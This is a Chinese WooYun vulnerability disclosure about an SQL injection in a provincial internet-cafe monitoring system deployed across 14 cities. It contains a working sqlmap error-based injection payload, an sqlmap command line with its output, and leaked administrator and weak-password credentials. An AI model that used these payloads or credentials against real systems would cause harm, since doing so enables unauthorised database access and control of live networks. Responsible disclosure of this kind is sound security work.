当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164837

漏洞标题:某省级网吧监控系统通用SQL注入导致该省各地网吧可被控制(殃及全省网吧系统+发送网吧滚动字幕/DBA权限)

相关厂商:某省级网吧监控系统

漏洞作者: 0x 80

提交时间:2015-12-26 19:38

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-26: 细节已通知厂商并且等待厂商处理中
2015-12-29: 厂商已经确认,细节仅向厂商公开
2016-01-08: 细节向核心白帽子及相关领域专家公开
2016-01-18: 细节向普通白帽子公开
2016-01-28: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

某省级网吧监控系统通用SQL注入导致该省各地网吧可被控制(殃及全省网吧系统+发送网吧滚动字幕/DBA权限)
PS:滚动字幕,HELLO?

详细说明:

长沙市:**.**.**.**/web;
株洲市:**.**.**.**/web;
湘潭市:**.**.**.**/web
衡阳市:**.**.**.**/web
邵阳市:**.**.**.**/web
岳阳市:**.**.**.**/web
常德市:**.**.**.**/web
张家界市:**.**.**.**/web
益阳市:**.**.**.**/web
郴州市:**.**.**.**/web
永州市:**.**.**.**/web
怀化市:**.**.**.**/web
娄底市:**.**.**.**/web
湘西自治州:**.**.**.**/web
都有WEB这个目录,同一系统
均存在注入
所有站都存在FCK编辑器
省级管理员帐号泄漏:zxb zxb

捕获99999.PNG


不过应该是网站设置了权限,不允许重定向
随便拿1个例子来测,直接POST注入获得数据库
**.**.**.**

Place: POST
Parameter: txtName1
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTEwNjM2Mzg3OTJkGAEFHl9fQ29udHJvbHNSZXF1aXJlU
zdEJhY2tLZXlfXxYBBQxTdWJtaXRfQ2xpY2tcr8 GHvWZF6a1Xisnn9od52q29w==&__VIEWSTATEG
ERATOR=DB1B4C9A&__EVENTVALIDATION=/wEWBAKEtafhCwLEhNitCALW44bXBAKXv6fMDAo5kJE2
Vx2kLabdxBKGOhw2t3&txtName1=-4595') OR 5009=CONVERT(INT,(CHAR(58) CHAR(113) CH
(118) CHAR(102) CHAR(58) (SELECT (CASE WHEN (5009=5009) THEN CHAR(49) ELSE CHA
48) END)) CHAR(58) CHAR(111) CHAR(97) CHAR(113) CHAR(58))) AND ('EGYn'='EGYn&t
Pwd1=&Submit_Click.x=1&Submit_Click.y=1
---
do you want to exploit this SQL injection? [Y/n] y
[22:12:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


捕获999.PNG


python sqlmap/sqlmap.py -u http://**.**.**.**/web/ --forms --current-db --threads 10 --level 5

捕获91.PNG


http://**.**.**.**/web/ 还存在弱口令
123 123

捕获9898.PNG


什么都有了
**.**.**.**/web

捕获99.PNG


捕获998.PNG


捕获99999.PNG


**.**.**.**/WEB/

捕获989899.PNG


漏洞证明:

长沙市:**.**.**.**/web;
株洲市:**.**.**.**/web;
湘潭市:**.**.**.**/web
衡阳市:**.**.**.**/web
邵阳市:**.**.**.**/web
岳阳市:**.**.**.**/web
常德市:**.**.**.**/web
张家界市:**.**.**.**/web
益阳市:**.**.**.**/web
郴州市:**.**.**.**/web
永州市:**.**.**.**/web
怀化市:**.**.**.**/web
娄底市:**.**.**.**/web
湘西自治州:**.**.**.**/web

修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-29 15:48

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无